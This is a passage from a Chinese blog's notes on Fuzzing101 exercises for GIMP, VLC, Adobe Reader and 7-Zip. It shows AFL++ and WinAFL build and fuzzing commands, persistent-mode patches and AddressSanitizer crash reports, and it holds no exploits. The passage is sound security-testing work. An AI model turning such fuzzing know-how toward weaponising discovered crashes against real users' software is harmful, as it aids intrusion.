class="hljs-number">::</span>dispatchEvent(WebCor<span class="hljs-number">e::</span>Node&, WebCor<span class="hljs-number">e::</span>Event&) Source/WebCore/dom/EventDispatcher.cpp:<span class="hljs-number">154</span><br> #<span class="hljs-number">38</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05b0c7e8</span> in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>dispatchEvent(WebCor<span class="hljs-number">e::</span>Event&) Source/WebCore/dom/Node.cpp:<span class="hljs-number">2373</span><br><br>SUMMARY: AddressSanitizer: heap-use-after-free DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">585</span> in WT<span 
class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>tableSizeMask() const<br>Shadow bytes around the buggy address:<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e8f0</span>: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fa fa<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e900</span>: fa fa fd fd fd fd fd fd fd fd fd fd fa fa fa fa<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e910</span>: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fd fd<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e920</span>: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e930</span>: fd fd fd fd fd fa fa fa fa fa fd fd 
fd fd fd fd<br>=><span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e940</span>: fd fd fd fd fa fa fa fa fd[fd]fd fd fd fd fd fd<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e950</span>: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e960</span>: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e970</span>: fa fa fd fd fd fd fd fd fd fd fd fd fa fa fa fa<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e980</span>: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa<br> <span class="hljs-number">0</span>x0c0e<span class="hljs-number">8000e990</span>: fa fa fa fa fa fa fa fa fa fa fa fa fd fd fd fd<br>Shadow byte legend (one shadow byte represents <span class="hljs-number">8</span> application bytes):<br> Addressable: <span class="hljs-number">00</span><br> Partially addressable: <span class="hljs-number">01 02 03 04</span> <span class="hljs-number">05</span> <span class="hljs-number">06</span> <span class="hljs-number">07</span> <br> Heap left redzone: fa<br> Freed heap region: fd<br> Stack left redzone: f1<br> Stack mid redzone: f2<br> Stack right redzone: f3<br> Stack after return: f5<br> Stack use after scope: f8<br> Global redzone: f9<br> Global init order: f6<br> Poisoned by user: f7<br> Container overflow: fc<br> Array cookie: ac<br> Intra object redzone: bb<br> ASan internal: fe<br> Left alloca redzone: ca<br> Right alloca redzone: cb<br></code></pre></td></tr></table></figure>]]></content>
<tags>
<tag>Fuzz</tag>
<tag>JS Engine</tag>
</tags>
</entry>
<entry>
<title>Fuzzing101笔记 6~10</title>
<link href="/2022/09/08/Fuzzing101%E7%AC%94%E8%AE%B0-6-10/"/>
<url>/2022/09/08/Fuzzing101%E7%AC%94%E8%AE%B0-6-10/</url>
<content type="html"><![CDATA[<h1 id="Exercise-6-GIMP"><a href="#Exercise-6-GIMP" class="headerlink" title="Exercise 6 - GIMP"></a>Exercise 6 - GIMP</h1><p><a href="https://www.cvedetails.com/cve/CVE-2016-4994/"><strong>CVE-2016-4994</strong></a> in GIMP 2.8.16 (Use-After-Free)</p><h2 id="更改源码使用persistent-mode"><a href="#更改源码使用persistent-mode" class="headerlink" title="更改源码使用persistent mode"></a>Modify the source to use persistent mode</h2><p>Apply only one of the two changes below, not both.</p><ol><li>app/app.c, line 252</li></ol><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">if</span> (run_loop){<br> <span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> __AFL_COMPILER</span><br> <span class="hljs-keyword">while</span>(__AFL_LOOP(<span class="hljs-number">1000</span>))<br> {<br> file_open_from_command_line (gimp, filenames[i], as_new);<br> }<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> <span class="hljs-meta">#<span class="hljs-keyword">else</span></span><br> file_open_from_command_line (gimp, filenames[i], as_new);<br> <span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br><br> }<br></code></pre></td></tr></table></figure><ol start="2"><li>app/xcf/xcf.c, line 280</li></ol><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> __AFL_COMPILER</span><br> <span class="hljs-keyword">while</span>(__AFL_LOOP(<span class="hljs-number">10000</span>)){<br><span class="hljs-meta">#<span class="hljs-keyword">endif</span> </span><br><br> info.fp = g_fopen (filename, <span class="hljs-string">"rb"</span>);<br> <span class="hljs-keyword">if</span> (info.fp)……<br> <span class="hljs-keyword">if</span> (success)……<br><span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> __AFL_COMPILER</span><br> }<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br> gimp_unset_busy (gimp);<br> <span class="hljs-keyword">return</span> return_vals;<br></code></pre></td></tr></table></figure><p>At first I was still editing it by hand, line by line; later I discovered the patch command, so after downloading the patch file it is done in one step.</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">patch</span> gimp-<span class="hljs-number">2</span>.<span class="hljs-number">8</span>.<span class="hljs-number">16</span>/app/xcf/xcf.c -i persistent.patch<br></code></pre></td></tr></table></figure><h2 id="编译文件"><a href="#编译文件" class="headerlink" title="编译文件"></a>Build</h2><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">CC=afl-clang-fast CXX=afl-clang-fast++ PKG_CONFIG_PATH=$PKG_CONFIG_PATH:$HOME/fuzz_target/fuzzing_gimp/gegl-0.2.0/ CFLAGS=<span class="hljs-string">"-fsanitize=address"</span> CXXFLAGS=<span 
class="hljs-string">"-fsanitize=address"</span> LDFLAGS=<span class="hljs-string">"-fsanitize=address"</span> <span class="hljs-string">./configure</span> <span class="hljs-params">--disable-gtktest</span> <span class="hljs-params">--disable-glibtest</span> <span class="hljs-params">--disable-alsatest</span> <span class="hljs-params">--disable-nls</span> <span class="hljs-params">--without-libtiff</span> <span class="hljs-params">--without-libjpeg</span> <span class="hljs-params">--without-bzip2</span> <span class="hljs-params">--without-gs</span> <span class="hljs-params">--without-libpng</span> <span class="hljs-params">--without-libmng</span> <span class="hljs-params">--without-libexif</span> <span class="hljs-params">--without-aa</span> <span class="hljs-params">--without-libxpm</span> <span class="hljs-params">--without-webkit</span> <span class="hljs-params">--without-librsvg</span> <span class="hljs-params">--without-print</span> <span class="hljs-params">--without-poppler</span> <span class="hljs-params">--without-cairo-pdf</span> <span class="hljs-params">--without-gvfs</span> <span class="hljs-params">--without-libcurl</span> <span class="hljs-params">--without-wmf</span> <span class="hljs-params">--without-libjasper</span> <span class="hljs-params">--without-alsa</span> <span class="hljs-params">--without-gudev</span> <span class="hljs-params">--disable-python</span> <span class="hljs-params">--enable-gimp-console</span> <span class="hljs-params">--without-mac-twain</span> <span class="hljs-params">--without-script-fu</span> <span class="hljs-params">--without-gudev</span> <span class="hljs-params">--without-dbus</span> <span class="hljs-params">--disable-mp</span> <span class="hljs-params">--without-linux-input</span> <span class="hljs-params">--without-xvfb-run</span> <span class="hljs-params">--with-gif-compression=none</span> <span class="hljs-params">--without-xmc</span> <span class="hljs-params">--with-shm=none</span> <span 
class="hljs-params">--enable-debug</span> <span class="hljs-params">--prefix=</span><span class="hljs-string">"$HOME/fuzz_target/fuzzing_gimp/install"</span><br><br>make -j$<span class="hljs-params">(nproc)</span><br>make install<br></code></pre></td></tr></table></figure><p>安装过程中也出了一些奇怪的报错,如果你遇到的和我一样可以参考我的解决方法</p><ol><li><p>error while loading shared libraries:</p><p>因为gegl库引发的报错,参考<a href="https://blog.csdn.net/wanxuexiang/article/details/84574660">解决方案</a></p></li><li><p>GLib-GObject-CRITICAL **: 15:19:52.668: g_param_spec_internal: assertion ‘is_valid_property_name (name)’ failed</p><p>因为gimp-console-2.8插件引发的报错,推测可能是因为编译时剔除了很多的依赖库,导致这些插件无法运行,删除即可。</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">rm .<span class="hljs-regexp">/install/</span>lib<span class="hljs-regexp">/gimp/</span><span class="hljs-number">2.0</span><span class="hljs-regexp">/plug-ins/</span>*<br></code></pre></td></tr></table></figure></li></ol><p>测试运行</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">.<span class="hljs-regexp">/install/</span>bin<span class="hljs-regexp">/gimp-console-2.8 ./i</span>n/SampleInput.xcf<br></code></pre></td></tr></table></figure><h2 id="fuzz"><a href="#fuzz" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">ASAN_OPTIONS</span>=detect_leaks=<span class="hljs-number">0</span>,abort_on_error=<span class="hljs-number">1</span>,symbolize=<span class="hljs-number">0</span> afl-fuzz -i ./in -o ./afl_out -D -t <span class="hljs-number">500</span> -- ./install/bin/gimp-console-<span class="hljs-number">2</span>.<span class="hljs-number">8</span> --verbose -d -f 
@@<br></code></pre></td></tr></table></figure><ul><li>程序中存在无限循环,需要设置<code>-t</code>参数timelimit提高效率,具体超时时长自己调整(我的破服务器上干脆设置成了500)</li><li>打开<code>-D</code>deterministic mutations</li></ul><p><img src="/image-20220728172051449.png"></p><h2 id="调试"><a href="#调试" class="headerlink" title="调试"></a>调试</h2><p>因为开了ASAN,直接执行crash</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">.<span class="hljs-regexp">/install/</span>bin<span class="hljs-regexp">/gimp-console-2.8 --verbose -d -f ./</span>path<span class="hljs-regexp">/to/</span>crash<br></code></pre></td></tr></table></figure><p>虽然跑出来的crash不少,但奇怪的是并没跑出预期的堆溢出,只有其他的几个小问题被找出来了。</p><h3 id="crash1"><a href="#crash1" class="headerlink" title="crash1"></a>crash1</h3><p>最快出的一个crash</p><p><img src="/image-20220725173502736.png"></p><ul><li>报错信息: <code>AddressSanitizer: allocator is out of memory trying to allocate 0xab9e16000 bytes</code>,这显然一点也不像一个UAF会出的报错,这里是一个memory exhaustion bug(fuzzing101作者也在文中提到了)</li></ul><h3 id="crash2"><a href="#crash2" class="headerlink" title="crash2"></a>crash2</h3><p><img src="/image-20220728172405282.png"></p><ul><li>报错信息:<code>AddressSanitizer: SEGV on unknown address 0x00000000008c</code>,segmentation violation访问空指针</li></ul><p>太怪了,结果是没出最重要的堆漏洞,反而是作者提到的次要问题给找出来了,难道AFL++版本可能会有影响?</p><h1 id="Exercise-7-VLC-Media-Player"><a href="#Exercise-7-VLC-Media-Player" class="headerlink" title="Exercise 7 - VLC Media Player"></a>Exercise 7 - VLC Media Player</h1><p>看到那个运行时间,瞬间不想再跑一遍,直接上最新版,按照他的类似方法去跑</p><h2 id="partial-instrumentation"><a href="#partial-instrumentation" class="headerlink" title="partial instrumentation"></a>partial 
instrumentation</h2><p>由于VLC根据文件头部的字节判断文件格式,使用不同模块对文件进行处理。如果我们不限制代码覆盖率范围,会导致AFL尝试变更文件头,进入处理其他文件的模块分支,并惊喜地发现代码覆盖率确实增长了一些。然而文件基本格式不符会导致AFL效率下滑,比如MKV文件样本在处理AVI文件的模块中,大量格式错误会让代码覆盖率增长缓慢。</p><p>因此限制代码覆盖率的检测范围是必要的,通过设置AFL++提供的<code>AFL_LLVM_ALLOWLIST</code>参数为配置文件,可以只针对指定的文件名、函数名进行覆盖率检测。</p><p>AFL++支持两种配置文件的编写方式,可以结合使用。</p><ul><li><p>文件名</p><ul><li>文件在项目中的完整相对路径</li><li>单文件名,无路径(如果项目存在同名文件,可能会instrument其他文件)</li></ul></li><li><p>函数名</p><p><code>fun:</code> + 函数名,会自动忽略其中的空格</p></li></ul><p>注意:使用文件名虽然方便很多,但它不是最可靠的方式,且存在失效的可能,如果用函数名指定就必定能配置到对应函数(手动找还是挺麻烦的)</p><p>Fuzzing101作者使用的方式是两种方法的结合,那我也不确定单独一个方法能否正确instrument我需要的文件,所以我也采用这种方法添加了demux mp4 的相关内容。</p><h2 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h2><p>一些必要的依赖库</p><figure class="highlight q"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs q">apt-<span class="hljs-built_in">get</span> install libxcb-composite0-<span class="hljs-built_in">dev</span> libxcb-glx0-<span class="hljs-built_in">dev</span> libxcb-dri2<span class="hljs-number">-0</span>-<span class="hljs-built_in">dev</span> libxcb-xf86dri0-<span class="hljs-built_in">dev</span> libxcb-xinerama0-<span class="hljs-built_in">dev</span> libxcb-render-util0-<span class="hljs-built_in">dev</span><br>apt-<span class="hljs-built_in">get</span> install libxcb-xv0-<span class="hljs-built_in">dev</span><br>apt-<span class="hljs-built_in">get</span> install libxcb-randr0-<span class="hljs-built_in">dev</span><br>apt-<span class="hljs-built_in">get</span> install libasound2-<span class="hljs-built_in">dev</span><br>apt-<span class="hljs-built_in">get</span> install libvlc-<span class="hljs-built_in">dev</span><br></code></pre></td></tr></table></figure><h2 id="获取样本文件"><a href="#获取样本文件" class="headerlink" title="获取样本文件"></a>获取样本文件</h2><p>这里要测试的是mp4相关的解析, 从<a 
href="https://samples.ffmpeg.org/">ffmpeg samples repository</a>上找几个mp4样本(里面居然有片???),通过剪辑软件生成尽可能小的文件。我采用的方式是只截取视频的2帧,然后降低分辨率和图像质量,最终生成的视频文件大概能控制在5KB以内,勉强能接受。</p><h2 id="测试运行"><a href="#测试运行" class="headerlink" title="测试运行"></a>测试运行</h2><p>先正常编译试试能否运行</p><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"><span class="hljs-string">./configure</span> <span class="hljs-params">--prefix=</span><span class="hljs-string">"$HOME/fuzz_real/fuzzing_vlc/vlc-3.0.17.4/install"</span> <span class="hljs-params">--disable-a52</span> <span class="hljs-params">--disable-lua</span> <span class="hljs-params">--disable-qt</span><br>make -j$<span class="hljs-params">(nproc)</span><br>make install<br><span class="hljs-string">./install/bin/vlc</span> <span class="hljs-params">--help</span><br></code></pre></td></tr></table></figure><h2 id="编译"><a href="#编译" class="headerlink" title="编译"></a>编译</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-attribute">CC</span>=afl-clang-fast <span class="hljs-attribute">CXX</span>=afl-clang-fast++ <span class="hljs-attribute">CFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span> <span class="hljs-attribute">CXXFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span> <span class="hljs-attribute">LDFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span> ./configure <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_real/fuzzing_vlc/vlc-3.0.17.4/install"</span> --disable-a52 --disable-lua --disable-qt<br><span class="hljs-attribute">AFL_LLVM_ALLOWLIST</span>=<span 
class="hljs-variable">$HOME</span>/fuzz_real/fuzzing_vlc/vlc-3.0.17.4/Partial_instrumentation <span class="hljs-attribute">ASAN_OPTIONS</span>=detect_leaks=0 make -j$(nproc) <span class="hljs-attribute">LDFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span><br></code></pre></td></tr></table></figure><p>这里要加ASAN_OPTIONS=detect_leaks=0,否则ASAN会给一个内存泄漏的警告,我也很想尝试patch一下,可惜调不出详细的报错路径。</p><p>编译harness,这里我直接用了他的harness(毕竟fuzz方法也差不多),不过他的harness里少了一个free,记得加上(不加似乎也不影响效果,但加了更好)。</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros">patch -p0 vlc-demux-run.c fuzzing_harness.patch<br>make vlc-demux-<span class="hljs-built_in">run</span> -j$(nproc) <span class="hljs-attribute">LDFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span><br></code></pre></td></tr></table></figure><p>这里fuzz的函数应该是vlc专门开放出来fuzz的一个接口,不然每次初始化vlc会浪费大量时间。但这个harness也仅局限与对demux模块的调试。</p><h2 id="fuzz-1"><a href="#fuzz-1" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">afl-fuzz -t <span class="hljs-number">300</span> -m none -i .<span class="hljs-regexp">/afl_in -o ./</span>afl_out -x mp4.dict -D -M master -- .<span class="hljs-regexp">/vlc-3.0.17.4/</span>test/vlc-demux-run @@ <br>afl-fuzz -t <span class="hljs-number">300</span> -m none -i .<span class="hljs-regexp">/afl_in -o ./</span>afl_out -S slave1 -- .<span class="hljs-regexp">/vlc-3.0.17.4/</span>test/vlc-demux-run @@ <br></code></pre></td></tr></table></figure><p><img src="/image-20220801090808164.png"></p><p>结果在最新的VLC里跑出来一个小小的FPE,虽然只能在Debug模式下触发。</p><h1 id="Exercise-8-Adobe-Reader"><a href="#Exercise-8-Adobe-Reader" class="headerlink" title="Exercise 8 - Adobe Reader"></a>Exercise 8 - Adobe 
Reader</h1><p>这玩意已经很久没有维护了,我这里测试的是9.5.5-1版本</p><h2 id="安装afl-qemu-trace"><a href="#安装afl-qemu-trace" class="headerlink" title="安装afl-qemu-trace"></a>安装afl-qemu-trace</h2><p>首先要保证装的是i386的qemu,如果按照原来的方法安装,会导致后面的qemu mode无法运行,这个问题坑了我好几天。</p><p>题目里的代码是有问题的,这里放上修改后的安装方法,我已经在git上向原作者发起了pull request,如果作者看到了应该会修复吧(大概)</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs awk">sudo apt install ninja-build libc6-dev-i386<br>cd ~<span class="hljs-regexp">/Downloads/</span>AFLplusplus<span class="hljs-regexp">/qemu_mode/</span><br>CPU_TARGET=i386 ./build_qemu_support.sh<br>sudo make install<br></code></pre></td></tr></table></figure><p>正确安装的afl-qemu-trace</p><p><img src="/12.png" alt="安装效果"></p><h2 id="获取样本文件-1"><a href="#获取样本文件-1" class="headerlink" title="获取样本文件"></a>获取样本文件</h2><p>这里我从<a href="https://github.com/0ca/corpus_pdfs%E8%8E%B7%E5%8F%96%E6%A0%B7%E6%9C%AC%E6%96%87%E4%BB%B6%E3%80%82">https://github.com/0ca/corpus_pdfs获取样本文件。</a></p><p>先筛选出大小小于2KB的文件,再用afl-cmin对文件进行压缩,最终生成样本文件。</p><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs gradle"><span class="hljs-keyword">find</span> corpus_pdfs<span class="hljs-regexp">/pdfs_all/</span> -<span class="hljs-keyword">size</span> -<span class="hljs-number">2</span>k -exec cp <span class="hljs-string">"{}"</span> pdf_corpus/ \;<br>ACRO_INSTALL_DIR=<span class="hljs-regexp">/opt/</span>Adobe<span class="hljs-regexp">/Reader9/</span>Reader ACRO_CONFIG=intellinux LD_LIBRARY_PATH=$LD_LIBRARY_PATH:<span class="hljs-string">'/opt/Adobe/Reader9/Reader/intellinux/lib'</span> afl-cmin -Q -i .<span class="hljs-regexp">/afl_in/</span> -o .<span class="hljs-regexp">/afl_in1/</span> -t <span class="hljs-number">2000</span> -- 
<span class="hljs-regexp">/opt/</span>Adobe<span class="hljs-regexp">/Reader9/</span>Reader<span class="hljs-regexp">/intellinux/</span>bin/acroread -toPostScript @@<br></code></pre></td></tr></table></figure><ul><li>afl-cmin是AFL++专门用来压缩样本的工具,调用方法和afl-fuzz基本一样,但是他只执行一轮。</li></ul><h2 id="分析程序"><a href="#分析程序" class="headerlink" title="分析程序"></a>分析程序</h2><p>使用valgrind和kcachegrind模块对程序进行分析</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs routeros">sudo apt-<span class="hljs-built_in">get</span> install valgrind<br>sudo apt-<span class="hljs-built_in">get</span> install kcachegrind<br><span class="hljs-attribute">ACRO_INSTALL_DIR</span>=/opt/Adobe/Reader9/Reader <span class="hljs-attribute">ACRO_CONFIG</span>=intellinux <span class="hljs-attribute">LD_LIBRARY_PATH</span>=<span class="hljs-variable">$LD_LIBRARY_PATH</span>:'/opt/Adobe/Reader9/Reader/intellinux/lib' valgrind <span class="hljs-attribute">--tool</span>=callgrind /opt/Adobe/Reader9/Reader/intellinux/bin/acroread -toPostScript [samplePDF]<br></code></pre></td></tr></table></figure><p>直接打开生成的callgrind文件进行查看</p><p><img src="/image-20220816152828217.png"></p><p>切换到call graph视图看得比较清楚,左侧比较重要的参数有</p><ul><li>incl.是inclusive的简写,表示的是该函数及其内容所有函数的内容所占用的CPU周期数百分比</li><li>self,表示该函数中除去其他函数的内容所占用的周期数</li><li>called,表示该函数在运行中的调用次数</li></ul><p>实际测试下来只有原文里选择的<code>0x085478AC</code>稳定性比较好,再往下的话稳定性都很差,不适合作为循环入口。</p><h2 id="fuzz-2"><a href="#fuzz-2" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">AFL_QEMU_PERSISTENT_ADDR=<span class="hljs-number">0</span>x085478AC AFL_QEMU_PERSISTENT_GPR=<span class="hljs-number">1</span> ACRO_INSTALL_DIR=<span class="hljs-regexp">/opt/</span>Adobe<span 
class="hljs-regexp">/Reader9/</span>Reader ACRO_CONFIG=intellinux LD_LIBRARY_PATH=<span class="hljs-variable">$LD_LIBRARY_PATH</span>:<span class="hljs-string">'/opt/Adobe/Reader9/Reader/intellinux/lib'</span> afl-fuzz -Q -i .<span class="hljs-regexp">/afl_in/</span> -o .<span class="hljs-regexp">/afl_out/</span> -t <span class="hljs-number">2000</span> -M master -- <span class="hljs-regexp">/opt/</span>Adobe<span class="hljs-regexp">/Reader9/</span>Reader<span class="hljs-regexp">/intellinux/</span>bin/acroread -toPostScript @@<br></code></pre></td></tr></table></figure><ul><li>-Q:使用qemu-mode</li><li>AFL_QEMU_PERSISTENT_ADDR:persistent mode</li><li>AFL_QEMU_PERSISTENT_GPR:记录第一次persistent周期循环开始时的GPR数据,在往后循坏开始时直接重置</li></ul><p><img src="/image-20220816161649550.png"></p><h2 id="调试-1"><a href="#调试-1" class="headerlink" title="调试"></a>调试</h2><p>直接运行是不会报错的,使用afl-qemu-trace加上QASAN查看详细报错信息。</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">AFL_USE_QASAN=<span class="hljs-number">1</span> ACRO_INSTALL_DIR=<span class="hljs-regexp">/opt/</span>Adobe<span class="hljs-regexp">/Reader9/</span>Reader ACRO_CONFIG=intellinux LD_LIBRARY_PATH=<span class="hljs-variable">$LD_LIBRARY_PATH</span>:<span class="hljs-string">'/opt/Adobe/Reader9/Reader/intellinux/lib'</span> <span class="hljs-regexp">/usr/</span>local<span class="hljs-regexp">/bin/</span>afl-qemu-trace -- <span class="hljs-regexp">/opt/</span>Adobe<span class="hljs-regexp">/Reader9/</span>Reader<span class="hljs-regexp">/intellinux/</span>bin/acroread -toPostScript <span class="hljs-number">1</span>.pdf<br></code></pre></td></tr></table></figure><p><img src="/image-20220816161624548.png"></p><ul><li>报错信息:<code>heap buffer overflow</code>,堆溢出,由于没有源码,作者也没有提怎么分析这个漏洞,所以我只能止步于此,有了解闭源的漏洞分析的师傅可以交流一下。</li></ul><h1 id="Exercise-9-7-Zip"><a href="#Exercise-9-7-Zip" class="headerlink" title="Exercise 9 - 7-Zip"></a>Exercise 9 - 
7-Zip</h1><p>Windows下使用winafl进行fuzzing,这里我只能用自己的本机,所以也没有长时间开着的条件,测试能运行就算成功。</p><h2 id="安装winAFL"><a href="#安装winAFL" class="headerlink" title="安装winAFL"></a>安装winAFL</h2><p>照着流程来基本没问题。</p><p>先下一个DynamoRio,在Visual Studio2019的命令行下完成安装,只要用官方的安装器下个community版本,安装C++开发组件,其他都是默认即可。</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">mkdir</span> build32<br><span class="hljs-attribute">cd</span> build32<br><span class="hljs-attribute">cmake</span> -G<span class="hljs-string">"Visual Studio 16 2019"</span> -A Win32 .. -DDynamoRIO_DIR=F:\softwareAnalysis\Fuzzing\fuzzing_7zip\DynamoRIO-Windows-<span class="hljs-number">8</span>.<span class="hljs-number">0</span>.<span class="hljs-number">0</span>-<span class="hljs-number">1</span>\cmake<br><span class="hljs-attribute">cmake</span> --build . 
--config Release<br></code></pre></td></tr></table></figure><p>安装正常的话会在<code>winafl\build32\bin\Release</code>下看到afl-fuzz.exe等文件。</p><p><img src="/image-20220816165418797.png"></p><h2 id="测试运行-1"><a href="#测试运行-1" class="headerlink" title="测试运行"></a>测试运行</h2><p>用DynamoRIO测试能否运行fuzz进程</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">F</span>:\softwareAnalysis\Fuzzing\fuzzing_7zip\DynamoRIO-Windows-<span class="hljs-number">8</span>.<span class="hljs-number">0</span>.<span class="hljs-number">0</span>-<span class="hljs-number">1</span>\bin32\drrun.exe -c winafl.dll -debug -target_module <span class="hljs-number">7</span>z.exe -target_offset <span class="hljs-number">0</span>x02F3B3 -fuzz_iterations <span class="hljs-number">10</span> -nargs <span class="hljs-number">2</span> -- <span class="hljs-string">"F:\softwareAnalysis\Fuzzing\fuzzing_7zip\7-Zip\7z.exe"</span> l F:\softwareAnalysis\Fuzzing\fuzzing_7zip\afl_in\example.img<br></code></pre></td></tr></table></figure><p>DynamoRio是一个全平台的动态插桩程序,winafl基于这个工具写了动态插桩winafl.c,编译后是winafl.dll,里面实现了覆盖率插桩、基于文件的共享内存、基于管道的状态传递等功能。</p><h2 id="fuzz-3"><a href="#fuzz-3" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">afl</span>-fuzz.exe -i F:\softwareAnalysis\Fuzzing\fuzzing_7zip\afl_in -o F:\softwareAnalysis\Fuzzing\fuzzing_7zip\afl_out -t <span class="hljs-number">2000</span> -D F:\softwareAnalysis\Fuzzing\fuzzing_7zip\DynamoRIO-Windows-<span 